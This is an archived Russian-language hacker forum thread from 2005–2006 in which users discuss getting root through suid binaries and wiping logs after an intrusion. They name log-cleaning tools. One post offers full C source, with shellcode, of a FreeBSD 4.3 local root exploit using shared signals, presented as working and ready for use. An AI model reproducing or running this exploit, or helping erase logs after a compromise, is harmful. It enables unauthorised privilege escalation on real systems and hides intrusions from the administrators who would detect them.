ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

13.11.2005, 12:39
|
|
Banned
Регистрация: 06.10.2005
Сообщений: 180
Провел на форуме: 244618
Репутация:
-4
|
|
Сообщение от qBiN
хихихихи)))
Ты что копировал из-какого нить шелла с алиасами?
Нах тебе искать то что ты не понимаешь:?:
sqid suid биты например. Вопще поставь себе линукс,мож выучиешь что-нибуть))))
sqid suid-права файла выполняться от прав рута они чем-то отличаются только хз чем 
Да...
Я по твоему не знал что sqid биты запушены от рута и имеют его привелегии.
Я Спрашивал про использывание их для получения рута.!
Насчет алиасов когда я используй веб шел мне свойственно запоминать команды если ты их сам придумываешь из головы из своей а не где не смотришь или узнаешь то извини...
Лан погорячился...
Последний раз редактировалось w4rd3n; 13.11.2005 в 12:55..
|
|
|

13.11.2005, 12:40
|
|
Banned
Регистрация: 06.10.2005
Сообщений: 180
Провел на форуме: 244618
Репутация:
-4
|
|
Сообщение от k1b0rg
логи почистить ванишем, чистит хорошо но медленно.
Я имею ввиду ручками...
|
|
|

30.11.2005, 22:47
|
|
Новичок
Регистрация: 07.11.2005
Сообщений: 11
Провел на форуме: 18244
Репутация:
-4
|
|
Нах ручками так быстрее.
как предложил k1b0rg
или от RST
stelchem
|
|
|

14.04.2006, 07:54
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме: 1730553
Репутация:
319
|
|
Сообщение от qBiN
ухахаха  ))))))))))))))
Это в линуксе, в фряхе master.passwd насколько я помню))
Под фряху не припомню ядерных експлойтов,так что все зависит от демонов,хотя все оч. самнительно...
Бывает часто плохо права выставленны...
Хех,ты забыл про один бронебойный сплойт.
Кому надо...Сплойт рабочий,бага актуальна....
Код:
/*
FreeBSD 4.3 local root exploit using shared signals.
Written by Georgi Guninski http://www.guninski.com
*/
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
int vv1;
#define MYSIG SIGINT
//exec "/tmp/sh", shellcode gotten from the internet and modified
unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x50\x50\xb0\xb7\xcd\x80"
"\x31\xc0\x50\x50\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80\x90\x90\x90";
typedef (*PROG)();
extern char **environ;
int main(int ac,char **av)
{
int pid;
//(*(PROG)bsdshell)();
if(!(vv1=getenv("vv")))
{
setenv("vv",bsdshell,1);
if(!execle(av[0],"vv",NULL,environ))
{
perror("weird exec");
exit(1);
}
}
printf("vvfreebsd. Written by Georgi Guninski\n");
printf("shall jump to %x\n",vv1);
if(!(pid=rfork(RFPROC|RFSIGSHARE)))
{
printf("child=%d\n",getpid());
// /usr/bin/login and rlogin work for me. ping gives nonsuid shell
// if(!execl("/usr/bin/rlogin","rlogin","localhost",0))
if(!execl("/usr/bin/login","login",0))
{
perror("exec setuid failed");
exit(2);
};
}
sleep(2);
signal(MYSIG,(sig_t)vv1);
sleep(2);
kill(pid,MYSIG);
printf("done\n");
while(42);
}
|
|
|

14.04.2006, 08:51
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме: 621131
Репутация:
47
|
|
Desr0w, взлом укртелекома? 
|
|
|

14.04.2006, 08:59
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме: 1730553
Репутация:
319
|
|
Какого телекома 
|
|
|

14.04.2006, 16:20
|
|
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме: 1535446
Репутация:
182
|
|
Хех,ты забыл про один бронебойный сплойт.
Дату моего сообщения посмотри.
|
|
|

14.04.2006, 16:40
|
|
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме: 2333839
Репутация:
212
|
|
блин где вы этот топик откапали! хватит уже древние поднимать)))
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|